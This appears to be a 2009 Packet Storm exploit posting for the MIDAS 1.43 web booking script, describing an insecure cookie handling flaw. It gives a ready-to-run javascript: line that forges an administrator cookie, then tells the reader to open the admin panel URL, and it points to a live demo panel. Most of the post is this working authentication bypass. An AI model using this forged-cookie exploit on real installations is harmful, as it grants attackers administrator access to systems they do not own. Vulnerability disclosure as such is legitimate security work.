MIDAS 1.43 Insecure Cookie

2009-06-23T00:00:00
ID PACKETSTORM:78561
Type packetstorm
Reporter HxH
Modified 2009-06-23T00:00:00

Description

                                        
                                            `--------------------------------------------  
  
MIDAS Insecure Cookie Handling Vulnerability  
  
--------------------------------------------  
  
Author.: HxH  
  
Contact: HxH[at]live[dot]at  
  
---------------------------  
  
Script.: MIDAS  
  
Home...: http://mid.as  
  
-------------------------------------------------------------------------------------------------  
  
Exploit: javascript:document.cookie="MIDAS=admin|Administrator|1|data0n9a|en-US|Default; path=/";  
  
Note...: After make cookie go direct to http://[website]/[script]/level1.pl?x=0  
  
-------------------------------------------------------------------------------------------------  
  
Demo...: http://demo.mid.as  
  
Panel..: http://demo.mid.as/level1.pl?x=0  
  
-----------------------------------------  
  
Greetz.: ~ Jiko ~ Sniper Code  
  
-----------------------------  
  
  
`